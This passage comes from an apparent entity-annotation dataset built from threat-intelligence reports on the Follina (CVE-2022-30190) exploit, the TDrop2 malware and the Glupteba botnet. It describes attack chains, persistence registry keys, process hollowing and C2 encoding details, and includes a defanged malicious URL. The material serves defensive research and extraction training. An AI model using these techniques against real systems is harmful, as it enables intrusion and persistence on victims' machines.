variants.","entities":[{"id":47278,"label":"identity","start_offset":114,"end_offset":132},{"id":47279,"label":"identity","start_offset":328,"end_offset":337},{"id":47280,"label":"attack-pattern","start_offset":366,"end_offset":387}],"relations":[],"Comments":[]} {"id":2147,"text":"Therefore, exploits for this vulnerability have potential to be of high impact.","entities":[],"relations":[],"Comments":[]} {"id":2148,"text":" We highly recommend following Microsoft’s guidance to protect your enterprise until a patch is issued to fix the problem.","entities":[{"id":45402,"label":"identity","start_offset":31,"end_offset":40}],"relations":[],"Comments":[]} {"id":2149,"text":"All known samples and URLs associated with this attack have been flagged in the Palo Alto Networks product suite so customers can receive protections. Attack Details for CVE-2022-30190 CVE-2022-30190 in the Wild Conclusion On May 27, 2022, a cybersecurity research team out of Tokyo, Japan, nao_sec, uncovered a malicious Word document uploaded to VirusTotal from an IP in Belarus.","entities":[{"id":47283,"label":"TIME","start_offset":228,"end_offset":240},{"id":47288,"label":"SOFTWARE","start_offset":324,"end_offset":328},{"id":47281,"label":"vulnerability","start_offset":171,"end_offset":185},{"id":47282,"label":"vulnerability","start_offset":186,"end_offset":200},{"id":47284,"label":"identity","start_offset":80,"end_offset":98},{"id":47285,"label":"location","start_offset":279,"end_offset":291},{"id":47286,"label":"SOFTWARE","start_offset":350,"end_offset":360},{"id":47287,"label":"location","start_offset":375,"end_offset":382}],"relations":[],"Comments":[]} {"id":2150,"text":"The document was abusing the Microsoft Word remote template feature to retrieve a malicious HTML file that subsequently used the ms-msdt Office URI scheme to execute PowerShell within the context of Word.","entities":[{"id":47290,"label":"SOFTWARE","start_offset":199,"end_offset":203},{"id":47289,"label":"tools","start_offset":166,"end_offset":176},{"id":47291,"label":"SOFTWARE","start_offset":29,"end_offset":43}],"relations":[],"Comments":[]} {"id":2151,"text":" On May 30, Keven Beaumont wrote an article detailing the specifics of the initial incident.","entities":[{"id":45404,"label":"identity","start_offset":12,"end_offset":26},{"id":45403,"label":"TIME","start_offset":4,"end_offset":10}],"relations":[],"Comments":[]} {"id":2152,"text":"The important thing to note here is that the decoy Word document had nothing inherently malicious outside of the link to the template hosted at hxxp:\/\/xmlformats[.]com, allowing it to bypass EDR solutions.","entities":[{"id":47292,"label":"SOFTWARE","start_offset":51,"end_offset":55},{"id":47293,"label":"URL","start_offset":144,"end_offset":167}],"relations":[],"Comments":[]} {"id":2153,"text":"The HTML code from the remote template is shown in Figure 1 below.","entities":[],"relations":[],"Comments":[]} {"id":2154,"text":" The JavaScript embedded within the HTML uses the ms-msdt schema to invoke the PCWDiagnostic pack, to reference the IT_BrowseForFile to execute the base64-encoded PowerShell Invoke-Expression command. The base64-decoded text within the PowerShell Invoke-Expression is shown in Figure 2 below.","entities":[{"id":47294,"label":"tools","start_offset":163,"end_offset":173},{"id":47295,"label":"tools","start_offset":237,"end_offset":247}],"relations":[],"Comments":[]} {"id":2155,"text":" This code does a few things.","entities":[],"relations":[],"Comments":[]} {"id":2156,"text":"First it kills the msdt.exe process.","entities":[{"id":47296,"label":"FILEPATH","start_offset":19,"end_offset":27}],"relations":[],"Comments":[]} {"id":2157,"text":"Then the code loops through the files within a .rar archive looking for a CAB file (TVNDRgAAAA base64 decodes to MSCF, which is the magic header of a CAB file).","entities":[],"relations":[],"Comments":[]} {"id":2158,"text":"It then stores it in a file called 1.t. 1.t, which gets base64 decoded to 1.c, expanded to rgb.exe and then finally executed.","entities":[],"relations":[],"Comments":[]} {"id":2159,"text":" None of the reports we’ve seen have recovered the final payload.","entities":[],"relations":[],"Comments":[]} {"id":2160,"text":"Therefore, the contents are unknown.","entities":[],"relations":[],"Comments":[]} {"id":2161,"text":" The use of remote templates to deliver malicious documents is not new, however, historically they’ve been used to host .docm or dotm (macro-enabled Word documents), which would still be affected by the local systems’s Word macro policy.","entities":[{"id":47298,"label":"SOFTWARE","start_offset":219,"end_offset":224},{"id":47297,"label":"SOFTWARE","start_offset":149,"end_offset":153}],"relations":[],"Comments":[]} {"id":2162,"text":"Therefore, the vulnerability of particular note in this attack lies in calling the Microsoft Support Diagnostic Tool (MSDT) using the ms-msdt URL Protocol within Word via the remotely loaded template file.","entities":[{"id":47300,"label":"SOFTWARE","start_offset":162,"end_offset":166},{"id":47299,"label":"SOFTWARE","start_offset":83,"end_offset":123}],"relations":[],"Comments":[]} {"id":2163,"text":"This allows execution of code within the context of Microsoft Word, even if macros are disabled.","entities":[{"id":45405,"label":"SOFTWARE","start_offset":52,"end_offset":66}],"relations":[],"Comments":[]} {"id":2164,"text":" Protected View was triggered during execution of the nao_sec example, however, John Hammond demonstrated you can bypass Protected View by using an RTF file instead.","entities":[],"relations":[],"Comments":[]} {"id":2165,"text":"This allows the attack to succeed even if the user simply views the file in the preview pane – with no clicks on the document necessary – making the attack much more dangerous.","entities":[],"relations":[],"Comments":[]} {"id":2166,"text":" Microsoft has since released protection guidance and assigned CVE-2022-30190 to this vulnerability.","entities":[{"id":45406,"label":"identity","start_offset":1,"end_offset":10},{"id":45407,"label":"vulnerability","start_offset":63,"end_offset":77}],"relations":[],"Comments":[]} {"id":2167,"text":"They provided a workaround to disable the MSDT URL protocol, however, this may break other diagnostic tools that rely on the MSDT URL protocol to operate.","entities":[],"relations":[],"Comments":[]} {"id":2168,"text":"They also recommend ensuring cloud-delivered protections and automatic sample submission for Microsoft Defender are enabled.","entities":[{"id":47301,"label":"SOFTWARE","start_offset":93,"end_offset":111}],"relations":[],"Comments":[]} {"id":2169,"text":"Microsoft recommends that customers of Microsoft Defender for Endpoint enable the attack surface reduction rule BlockOfficeCreateProcessRule.","entities":[{"id":45408,"label":"identity","start_offset":0,"end_offset":9},{"id":45409,"label":"SOFTWARE","start_offset":39,"end_offset":70}],"relations":[],"Comments":[]} {"id":2170,"text":" So far, Palo Alto Networks is only seeing indications of testing within our customer telemetry indicated by final payload execution of benign executables such as calc.exe and notepad.exe.","entities":[{"id":47302,"label":"identity","start_offset":9,"end_offset":27},{"id":47303,"label":"FILEPATH","start_offset":176,"end_offset":187},{"id":47304,"label":"FILEPATH","start_offset":163,"end_offset":171}],"relations":[],"Comments":[]} {"id":2171,"text":"Palo Alto Networks and Unit 42 will continue to monitor for evidence of exploitation and further novel use cases.","entities":[{"id":47305,"label":"identity","start_offset":0,"end_offset":18},{"id":47306,"label":"identity","start_offset":23,"end_offset":30}],"relations":[],"Comments":[]} {"id":2172,"text":" Based on the amount of publicly available information, the ease of use and the extreme effectiveness of this exploit, Palo Alto Networks highly recommends following Microsoft’s guidance to protect your enterprise until a patch is issued to fix the problem.","entities":[{"id":45410,"label":"identity","start_offset":119,"end_offset":137},{"id":45411,"label":"identity","start_offset":166,"end_offset":175}],"relations":[],"Comments":[]} {"id":2173,"text":" Next-Generation Firewalls (PA-Series, VM-Series and CN-Series) or Prisma Access with a Threat Prevention security subscription can automatically block sessions related to this vulnerability using Threat ID 92623 (Application and Threat content update 8575). WildFire and Cortex XDR categorize all known samples we’ve come across as malware.","entities":[{"id":47307,"label":"SOFTWARE","start_offset":67,"end_offset":105},{"id":47308,"label":"SOFTWARE","start_offset":260,"end_offset":268},{"id":47309,"label":"SOFTWARE","start_offset":273,"end_offset":283}],"relations":[],"Comments":[]} {"id":2174,"text":" Cortex XDR Agent 7.5 and higher (with content version 540-92526) prevents attempts to exploit this vulnerability with the Behavioral Threat Protection module.","entities":[{"id":47310,"label":"SOFTWARE","start_offset":1,"end_offset":21}],"relations":[],"Comments":[]} {"id":2175,"text":"The Cortex XSOAR “CVE-2022-30190 - MSDT RCE” playbook helps speed up the discovery and remediation of compromised hosts within the network.","entities":[{"id":45412,"label":"vulnerability","start_offset":18,"end_offset":32},{"id":45413,"label":"SOFTWARE","start_offset":4,"end_offset":16}],"relations":[],"Comments":[]} {"id":2176,"text":"The playbook can be found on the XSOAR marketplace.","entities":[],"relations":[],"Comments":[]} {"id":2177,"text":" Additionally, all encountered URLs have been flagged as malware within PAN-DB, the Advanced URL Filtering URL database.","entities":[],"relations":[],"Comments":[]} {"id":2178,"text":"Customers can leverage this service with best practice configuration for further protection.","entities":[],"relations":[],"Comments":[]} {"id":2179,"text":" If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call: As further information or detections are put into place, Palo Alto Networks will update this publication accordingly.","entities":[{"id":47312,"label":"identity","start_offset":190,"end_offset":208},{"id":47311,"label":"identity","start_offset":92,"end_offset":122}],"relations":[],"Comments":[]} {"id":2180,"text":"Updated June 3, 2022, at 3:30 p.m. PT.","entities":[{"id":47313,"label":"TIME","start_offset":8,"end_offset":37}],"relations":[],"Comments":[]} {"id":2181,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":2182,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":2183,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":2184,"text":"Palo Alto Networks recently identified a new campaign targeting the transportation sector in Europe with ties to the Dark Seoul and Operation Troy campaigns that took place in 2013.","entities":[{"id":45416,"label":"campaign","start_offset":117,"end_offset":127},{"id":45417,"label":"campaign","start_offset":132,"end_offset":146},{"id":45418,"label":"TIME","start_offset":176,"end_offset":180},{"id":45414,"label":"identity","start_offset":0,"end_offset":18},{"id":45415,"label":"location","start_offset":93,"end_offset":99},{"id":6575,"label":"threat-actor","start_offset":117,"end_offset":127}],"relations":[],"Comments":[]} {"id":2185,"text":"This new campaign used updated instances of the Tdrop malware family discovered in the Operation Troy campaign.","entities":[{"id":6580,"label":"malware","start_offset":48,"end_offset":53},{"id":47314,"label":"campaign","start_offset":87,"end_offset":110}],"relations":[{"id":313,"from_id":47314,"to_id":6580,"type":"delivers"}],"Comments":[]} {"id":2186,"text":"For more information on the new campaign discovered by Unit 42, please refer to our recent blog post.","entities":[{"id":47315,"label":"identity","start_offset":55,"end_offset":62}],"relations":[],"Comments":[]} {"id":2187,"text":"In this attack, attackers embedded the TDrop2 malware inside a legitimate video software package hosted on the software distributor’s website.","entities":[{"id":45419,"label":"malware","start_offset":39,"end_offset":45}],"relations":[],"Comments":[]} {"id":2188,"text":"By doing this, they were able to target organizations that relied on the distributor’s security camera solution and infect their systems with malware.","entities":[],"relations":[],"Comments":[]} {"id":2189,"text":"They created a true Trojan horse, which sneaks into a network as a gift, but when opened, the attacker’s army leaps out.","entities":[],"relations":[],"Comments":[]} {"id":2190,"text":" The malware used for the attempted infection purported to be a legitimate video player, providing viewing software for security camera solutions.","entities":[],"relations":[],"Comments":[]} {"id":2191,"text":"The following two unique file names were involved in the attack.","entities":[],"relations":[],"Comments":[]} {"id":2192,"text":" The difference between the files involves the specific video player that was dropped and executed during runtime.","entities":[],"relations":[],"Comments":[]} {"id":2193,"text":"Each file would drop and execute the full or light version of the legitimate video player respective to the file name.","entities":[],"relations":[],"Comments":[]} {"id":2194,"text":" Both the legitimate copy of the video player, as well as a malicious executable were bundled into a single executable.","entities":[],"relations":[],"Comments":[]} {"id":2195,"text":"These files were added to the end of the Trojan executable, as seen below.","entities":[],"relations":[],"Comments":[]} {"id":2196,"text":" When initially run, the malware checks to see if its parent process is either explorer.exe or cmd.exe.","entities":[{"id":45421,"label":"FILEPATH","start_offset":95,"end_offset":102},{"id":45420,"label":"FILEPATH","start_offset":79,"end_offset":91}],"relations":[],"Comments":[]} {"id":2197,"text":"In the event the malware is not running in the context of either of these processes, it will exit.","entities":[],"relations":[],"Comments":[]} {"id":2198,"text":"This check exists in a number of the subsequent processes\/executables used by the TDrop2 malware variant.","entities":[{"id":6600,"label":"malware","start_offset":82,"end_offset":88}],"relations":[],"Comments":[]} {"id":2199,"text":" Subsequently, the malware proceeds to extract both the video player and the embedded malware using a series of calls to CreateFile, CreateFileMapping, GetFileSize, and MapViewOfFile.","entities":[],"relations":[],"Comments":[]} {"id":2200,"text":"Once extracted, the file writes it to a new file on disk prior to executing it.","entities":[],"relations":[],"Comments":[]} {"id":2201,"text":"The video player is written to one of the following locations, based on the original filename: The malware itself is written to the %TEMP% directory as well.","entities":[{"id":47316,"label":"FILEPATH","start_offset":133,"end_offset":139}],"relations":[],"Comments":[]} {"id":2202,"text":"The filename is derived by randomly choosing an executable name from the system32 directory.","entities":[{"id":47317,"label":"FILEPATH","start_offset":73,"end_offset":81}],"relations":[],"Comments":[]} {"id":2203,"text":"The randomly chosen executable must not contain any of the following strings: This dropped malware begins by performing the same parent process check witnessed in the original sample.","entities":[],"relations":[],"Comments":[]} {"id":2204,"text":"In the event the malware is not running within the parent process of cmd.exe or explorer.exe, it will exit immediately.","entities":[{"id":6607,"label":"malware","start_offset":69,"end_offset":76}],"relations":[],"Comments":[]} {"id":2205,"text":"This malware sample will also dynamically load a number of functions and libraries.","entities":[],"relations":[],"Comments":[]} {"id":2206,"text":"After the kernel32.dll and ntdll.dll libraries are loaded via calls to GetModuleHandle, the following process takes place:","entities":[{"id":47319,"label":"FILEPATH","start_offset":27,"end_offset":36},{"id":47318,"label":"FILEPATH","start_offset":10,"end_offset":22}],"relations":[],"Comments":[]} {"id":2207,"text":" In total, the following 14 functions are loaded during runtime: ","entities":[],"relations":[],"Comments":[]} {"id":2208,"text":"After these functions are loaded, the malware will randomly select an executable from the system32 using the same routine witnessed in the earlier sample.","entities":[{"id":47320,"label":"FILEPATH","start_offset":90,"end_offset":98}],"relations":[],"Comments":[]} {"id":2209,"text":"The malware proceeds to spawn a new process of the selected executable and performs a technique called process hollowing to hide itself inside a legitimate executable.","entities":[],"relations":[],"Comments":[]} {"id":2210,"text":"This leads us to the next stage of our malware This particular stage of malware acts as a downloader.","entities":[],"relations":[],"Comments":[]} {"id":2211,"text":"The parent process check is not used in this particular sample.","entities":[],"relations":[],"Comments":[]} {"id":2212,"text":"The malware initially attempts to download a file from the following location:","entities":[],"relations":[],"Comments":[]} {"id":2213,"text":" While the link above shows a file extension of an image, the transferred file is in fact a modified executable file. The downloaded file has the first two bytes of the PE file format replaced with the characters ‘DW’, instead of the usual ‘MZ’.","entities":[],"relations":[],"Comments":[]} {"id":2214,"text":"After the download occurs, the malware immediately corrects the first two bytes with the ‘MZ’ characters prior to writing the file to disk.","entities":[],"relations":[],"Comments":[]} {"id":2215,"text":" The downloaded file is dropped to the system32 folder.","entities":[{"id":47321,"label":"FILEPATH","start_offset":39,"end_offset":47}],"relations":[],"Comments":[]} {"id":2216,"text":"The malware selects a randomly chosen DLL from this directory.","entities":[],"relations":[],"Comments":[]} {"id":2217,"text":"The base name of this DLL is used to write the downloaded file.","entities":[],"relations":[],"Comments":[]} {"id":2218,"text":"As an example, in the event apcups.dll was selected, the malware would write the downloaded file to apcups.exe in the same folder.","entities":[{"id":47322,"label":"FILEPATH","start_offset":100,"end_offset":110}],"relations":[],"Comments":[]} {"id":2219,"text":"The downloader then proceeds to execute this downloaded file in a new process.","entities":[],"relations":[],"Comments":[]} {"id":2220,"text":" As we’ve seen in previous samples, this executable file begins by checking the parent process for the presence of ‘cmd.exe’ or ‘explorer.exe’.","entities":[{"id":45422,"label":"FILEPATH","start_offset":116,"end_offset":123},{"id":45423,"label":"FILEPATH","start_offset":129,"end_offset":141}],"relations":[],"Comments":[]} {"id":2221,"text":"It proceeds to randomly select an executable file in the system32 folder, and performs process hollowing against it.","entities":[{"id":47324,"label":"attack-pattern","start_offset":87,"end_offset":104},{"id":47323,"label":"FILEPATH","start_offset":57,"end_offset":65}],"relations":[],"Comments":[]} {"id":2222,"text":"The injected executable contains the last stage of the TDrop2 malware variant.","entities":[{"id":6630,"label":"malware","start_offset":55,"end_offset":61}],"relations":[],"Comments":[]} {"id":2223,"text":" Upon execution, we once again see the parent process check to determine if the malware is running within the ‘cmd.exe’ or ‘explorer.exe’ parent process.","entities":[{"id":45424,"label":"FILEPATH","start_offset":111,"end_offset":118},{"id":45425,"label":"FILEPATH","start_offset":124,"end_offset":136}],"relations":[],"Comments":[]} {"id":2224,"text":"It continues to dynamically load a number of libraries and functions for later use.","entities":[],"relations":[],"Comments":[]} {"id":2225,"text":"A feature that has yet to be seen is that of string encryption.","entities":[],"relations":[],"Comments":[]} {"id":2226,"text":"Strings are encrypted using the following function, represented in Python:","entities":[],"relations":[],"Comments":[]} {"id":2227,"text":"After dynamically loading functions and libraries, the malware iterates through the running processes and attempts to determine if the ‘V3lite.exe’ process is running.","entities":[{"id":47325,"label":"FILEPATH","start_offset":136,"end_offset":146}],"relations":[],"Comments":[]} {"id":2228,"text":"This process name is associated with the South Korean-based AhnLab security software provider.","entities":[{"id":47326,"label":"location","start_offset":41,"end_offset":53},{"id":47327,"label":"identity","start_offset":60,"end_offset":66}],"relations":[],"Comments":[]} {"id":2229,"text":"In the event this process is running, the malware will attempt to kill the process’ class window.","entities":[],"relations":[],"Comments":[]} {"id":2230,"text":" The final payload proceeds to generate the following mutex to ensure only one copy of the malware is running concurrently: Global\\SPPLMUTEX The payload then spawns two threads—one to maintain persistence and another to gather victim information and perform command and control operations.","entities":[],"relations":[],"Comments":[]} {"id":2231,"text":"Persistence is achieved by setting the following registry key: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run The name of the registry key in the above instances is derived from the basename of the supplied argument.","entities":[{"id":6650,"label":"REGISTRYKEY","start_offset":64,"end_offset":114},{"id":6651,"label":"REGISTRYKEY","start_offset":116,"end_offset":166}],"relations":[],"Comments":[]} {"id":2232,"text":"In the event the supplied argument was C:\\malware.exe, the registry key would be named ‘malware’, and the path for this key would be ‘C:\\malware.exe’. The persistence thread runs in a loop where the registry keys are set every 60 seconds, ensuring persistence even in the event an administrator manually deletes the registry keys.","entities":[{"id":45426,"label":"FILEPATH","start_offset":39,"end_offset":53},{"id":45427,"label":"FILEPATH","start_offset":134,"end_offset":148},{"id":6655,"label":"TIME","start_offset":222,"end_offset":238}],"relations":[],"Comments":[]} {"id":2233,"text":" The other thread begins by collecting information about the victim, such as the following: These data points are used to generate a unique victim ID, which is stored in the following registry key: HKCU\\SOFTWARE\\Microsoft\\HY08A\\Build The malware will continue to decrypt and store embedded C2 URLs.","entities":[{"id":47328,"label":"REGISTRYKEY","start_offset":200,"end_offset":235}],"relations":[],"Comments":[]} {"id":2234,"text":"The following URLs have been identified:","entities":[],"relations":[],"Comments":[]} {"id":2235,"text":" The final payload proceeds to enter its command and control loop.","entities":[],"relations":[],"Comments":[]} {"id":2236,"text":"It initially performs a DNS check against microsoft.com to ensure it has Internet connectivity.","entities":[],"relations":[],"Comments":[]} {"id":2237,"text":"After this check is performed, it enters an infinite loop, with a sleep interval set at a default of 30 minutes.","entities":[{"id":6668,"label":"TIME","start_offset":101,"end_offset":111}],"relations":[],"Comments":[]} {"id":2238,"text":"The malware will periodically poll the C2 server and determine if any commands are received.","entities":[],"relations":[],"Comments":[]} {"id":2239,"text":"The initial POST request contains a unique victim identifier that was previously generated.","entities":[],"relations":[],"Comments":[]} {"id":2240,"text":"The optional response by the C2 server is both encoded and encrypted. The data is first encrypted using an unidentified algorithm.","entities":[],"relations":[],"Comments":[]} {"id":2241,"text":"The two keys used for this encryption are generated using another unidentified algorithm.","entities":[],"relations":[],"Comments":[]} {"id":2242,"text":"The following Python script can be used to generate the keys.","entities":[],"relations":[],"Comments":[]} {"id":2243,"text":"A default salt of ‘FFFFFFFF’ is used.","entities":[],"relations":[],"Comments":[]} {"id":2244,"text":" Additionally, the following Python script can be used for encryption\/decryption ","entities":[],"relations":[],"Comments":[]} {"id":2245,"text":"After the data is encrypted, it is then base64-encoded using a custom alphabet.","entities":[],"relations":[],"Comments":[]} {"id":2246,"text":"The following alphabet is used: 3bcd1fghijklmABCDEFGH-J+LMnopq4stuvwxyzNOPQ7STUVWXYZ0e2ar56R89K\/ ","entities":[],"relations":[],"Comments":[]} {"id":2247,"text":"When the previously mentioned C2 response is both decoded and decrypted, we are presented with the following data: The command structure of the C2 response always begins with the string ‘tick’","entities":[],"relations":[],"Comments":[]} {"id":2248,"text":"The number following this string is most likely a unique command identifier.","entities":[],"relations":[],"Comments":[]} {"id":2249,"text":"The malware will store these command identifiers in the following files: In the event the number after the tick was previously witnessed, the command from the C2 will be ignored.","entities":[],"relations":[],"Comments":[]} {"id":2250,"text":"The remaining lines are then parsed.","entities":[],"relations":[],"Comments":[]} {"id":2251,"text":"The following commands are supported: Once again, using the previous example, the malware will first ensure that the command was not previously parsed\/executed.","entities":[],"relations":[],"Comments":[]} {"id":2252,"text":"In the event it is new, it will proceed to execute the various reconnaissance commands found on line #2.","entities":[],"relations":[],"Comments":[]} {"id":2253,"text":"The results of these commands are uploaded to the C2 server.","entities":[],"relations":[],"Comments":[]} {"id":2254,"text":" As we can see in the above network traffic, the malware attempts to disguise the data as a .gif image.","entities":[],"relations":[],"Comments":[]} {"id":2255,"text":"Finally, the malware will parse the third line, which instructs the malware to modify the wait interval to a value of ‘60’.","entities":[],"relations":[],"Comments":[]} {"id":2256,"text":"This interval value is set in the following registry key: HKCU\\Software\\Microsoft\\HY08A\\Policy Additionally, in the event the C2 response instructs the malware to update C2 URLs, it will be in the following format: 1001; [unique_identifier] [url] The malware will encrypt the URL string with a 4-byte XOR key of “\\x01\\x02\\x03\\x04” and store this data in the following registry key: HKCU\\Software\\Microsoft\\HY08A\\[unique_identifier] The TDrop2 malware family that was witnessed in a recent attack against a European transportation company provided a minimal set of commands to the attackers.","entities":[{"id":45428,"label":"REGISTRYKEY","start_offset":59,"end_offset":95},{"id":45430,"label":"malware","start_offset":442,"end_offset":448},{"id":6702,"label":"REGISTRYKEY","start_offset":387,"end_offset":435},{"id":47329,"label":"location","start_offset":512,"end_offset":520}],"relations":[],"Comments":[]} {"id":2257,"text":"It was most likely used to establish a foothold, perform reconnaissance and deploy further malware into the victim’s network.","entities":[],"relations":[],"Comments":[]} {"id":2258,"text":"While the malware lacked a large set of capabilities, it had a wealth of interesting and advanced features, such as the custom encryption\/encoding witnessed in the network traffic, the use of process hollowing against a randomly selected Microsoft Windows binary, and the downloading component that attempted to bypass network security measures by modifying the executable header.","entities":[{"id":47331,"label":"SOFTWARE","start_offset":238,"end_offset":255},{"id":47330,"label":"attack-pattern","start_offset":192,"end_offset":209}],"relations":[],"Comments":[]} {"id":2259,"text":" We created the AutoFocus tag TDrop2 to identify samples of this new variant and added known C2 domains and hash values to the Threat Prevention product set.","entities":[{"id":45431,"label":"malware","start_offset":30,"end_offset":36}],"relations":[],"Comments":[]} {"id":2260,"text":"At this time, WildFire is able to correctly identify the samples associated with this campaign as malicious.","entities":[{"id":47332,"label":"SOFTWARE","start_offset":14,"end_offset":22}],"relations":[],"Comments":[]} {"id":2261,"text":" Stage 1 Stage 2 Stage 3 Stage 4 Stage 5 ","entities":[],"relations":[],"Comments":[]} {"id":2262,"text":"Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":2263,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":2264,"text":"This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q1 2022.","entities":[{"id":47333,"label":"TIME","start_offset":96,"end_offset":103}],"relations":[],"Comments":[]} {"id":2265,"text":"It was last updated on May 12, 2022.","entities":[{"id":45432,"label":"TIME","start_offset":23,"end_offset":35}],"relations":[],"Comments":[]} {"id":2267,"text":"Google TAG actively monitors threat actors and the evolution of their tactics and techniques.","entities":[{"id":47335,"label":"identity","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} {"id":2268,"text":"We use our research to continuously improve the safety and security of our products and share this intelligence with the community to benefit the internet as a whole.","entities":[],"relations":[],"Comments":[]} {"id":2269,"text":"As announced today, Google has taken action to disrupt the operations of Glupteba, a multi-component botnet targeting Windows computers.","entities":[{"id":6747,"label":"malware","start_offset":73,"end_offset":81},{"id":47336,"label":"identity","start_offset":20,"end_offset":26},{"id":47337,"label":"SOFTWARE","start_offset":118,"end_offset":125}],"relations":[],"Comments":[]} {"id":2270,"text":"We believe this action will have a significant impact on Glupteba's operations.","entities":[{"id":47338,"label":"malware","start_offset":57,"end_offset":65}],"relations":[],"Comments":[]} {"id":2271,"text":"However, the operators of Glupteba are likely to attempt to regain control of the botnet using a backup command and control mechanism that uses data encoded on the Bitcoin blockchain.","entities":[{"id":45434,"label":"malware","start_offset":26,"end_offset":34},{"id":45433,"label":"SOFTWARE","start_offset":164,"end_offset":171}],"relations":[],"Comments":[]} {"id":2272,"text":"Glupteba is known to steal user credentials and cookies, mine cryptocurrencies on infected hosts, deploy and operate proxy components targeting Windows systems and IoT devices.","entities":[{"id":47339,"label":"malware","start_offset":0,"end_offset":8},{"id":47343,"label":"attack-pattern","start_offset":57,"end_offset":96},{"id":47340,"label":"SOFTWARE","start_offset":144,"end_offset":151},{"id":47341,"label":"attack-pattern","start_offset":21,"end_offset":55},{"id":47342,"label":"attack-pattern","start_offset":98,"end_offset":133}],"relations":[],"Comments":[]} {"id":2273,"text":"TAG has observed the botnet targeting victims worldwide, including the US, India, Brazil and Southeast Asia.","entities":[{"id":47345,"label":"location","start_offset":71,"end_offset":73},{"id":47344,"label":"identity","start_offset":0,"end_offset":3},{"id":47347,"label":"location","start_offset":82,"end_offset":88},{"id":47346,"label":"location","start_offset":75,"end_offset":80},{"id":47348,"label":"location","start_offset":93,"end_offset":107}],"relations":[],"Comments":[]} {"id":2274,"text":"The Glupteba malware family is primarily distributed through pay per install (PPI) networks and via traffic purchased from traffic distribution systems (TDS).","entities":[{"id":45435,"label":"malware","start_offset":4,"end_offset":12}],"relations":[],"Comments":[]} {"id":2275,"text":"For a period of time, we observed thousands of instances of malicious Glupteba downloads per day.","entities":[{"id":6771,"label":"malware","start_offset":70,"end_offset":78}],"relations":[],"Comments":[]} {"id":2276,"text":"The following image shows a webpage mimicking a software crack download which delivers a variant of Glupteba to users instead of the promised software.","entities":[{"id":6773,"label":"malware","start_offset":100,"end_offset":108}],"relations":[],"Comments":[]} {"id":2277,"text":"While analyzing Glupteba binaries, our team identified a few containing a git repository URL: “git.voltronwork.com”.","entities":[{"id":45437,"label":"DOMAIN","start_offset":95,"end_offset":114},{"id":45436,"label":"malware","start_offset":16,"end_offset":24}],"relations":[],"Comments":[]} {"id":2278,"text":"This finding sparked an investigation that led us to identify, with high confidence, multiple online services offered by the individuals operating the Glupteba botnet.","entities":[{"id":6777,"label":"malware","start_offset":151,"end_offset":159}],"relations":[],"Comments":[]} {"id":2279,"text":"These services include selling access to virtual machines loaded with stolen credentials (dont[.]farm), proxy access (awmproxy), and selling credit card numbers (extracard) to be used for other malicious activities such as serving malicious ads and payment fraud on Google Ads.","entities":[{"id":47349,"label":"DOMAIN","start_offset":90,"end_offset":101},{"id":47350,"label":"SOFTWARE","start_offset":266,"end_offset":276}],"relations":[],"Comments":[]} {"id":2280,"text":"This past year, TAG has been collaborating with Google’s CyberCrime Investigation Group to disrupt Glupteba activity involving Google services.","entities":[{"id":45441,"label":"identity","start_offset":16,"end_offset":19},{"id":45438,"label":"malware","start_offset":99,"end_offset":107},{"id":45439,"label":"identity","start_offset":48,"end_offset":87},{"id":45440,"label":"SOFTWARE","start_offset":127,"end_offset":142}],"relations":[],"Comments":[]} {"id":2281,"text":"We’ve terminated around 63M Google Docs observed to have distributed Glupteba, 1,183 Google Accounts, 908 Cloud Projects, and 870 Google Ads accounts associated with their distribution.","entities":[{"id":47353,"label":"SOFTWARE","start_offset":130,"end_offset":140},{"id":47351,"label":"SOFTWARE","start_offset":28,"end_offset":39},{"id":47352,"label":"malware","start_offset":69,"end_offset":77}],"relations":[],"Comments":[]} {"id":2282,"text":"Furthermore, 3.5M users were warned before downloading a malicious file through Google Safe Browsing warnings.","entities":[{"id":47354,"label":"SOFTWARE","start_offset":80,"end_offset":100}],"relations":[],"Comments":[]} {"id":2283,"text":"In the last few days, our team partnered with Internet infrastructure providers and hosting providers, including Cloudflare, to disrupt Glupteba’s operation by taking down servers and placing warning interstitial pages in front of the malicious domain names.","entities":[{"id":45443,"label":"malware","start_offset":136,"end_offset":144},{"id":45442,"label":"identity","start_offset":113,"end_offset":123}],"relations":[],"Comments":[]} {"id":2284,"text":"During this time, an additional 130 Google accounts associated with this operation were terminated.","entities":[{"id":47355,"label":"identity","start_offset":36,"end_offset":42}],"relations":[],"Comments":[]} {"id":2285,"text":"Parallel to the analysis, tracking, and technical disruption of this botnet, Google has filed a lawsuit against two individuals believed to be located in Russia for operating the Glupteba Botnet and its various criminal schemes.","entities":[{"id":47357,"label":"identity","start_offset":77,"end_offset":83},{"id":47356,"label":"malware","start_offset":179,"end_offset":187},{"id":47358,"label":"location","start_offset":154,"end_offset":160}],"relations":[{"id":314,"from_id":47356,"to_id":47358,"type":"located-at"}],"Comments":[]} {"id":2286,"text":"Google is alleging violations under the Racketeer Influenced and Corrupt Organizations Act (RICO), the Computer Fraud and Abuse Act, the Electronic Communications Privacy Act, the Lanham Act, and tortious interference of business relationships, and unjust enrichment.","entities":[{"id":45444,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":2287,"text":"While these actions may not completely stop Glupteba, TAG estimates that combined efforts will materially affect the actor’s ability to conduct future operations.","entities":[{"id":47360,"label":"identity","start_offset":54,"end_offset":57},{"id":47359,"label":"malware","start_offset":44,"end_offset":52}],"relations":[],"Comments":[]} {"id":2288,"text":"The command and control (C2) communication for this botnet uses HTTPS to communicate commands and binary updates between the control servers and infected systems.","entities":[],"relations":[],"Comments":[]} {"id":2289,"text":"To add resilience to their infrastructure, the operators have also implemented a backup mechanism using the Bitcoin blockchain.","entities":[{"id":45445,"label":"SOFTWARE","start_offset":108,"end_offset":115}],"relations":[],"Comments":[]} 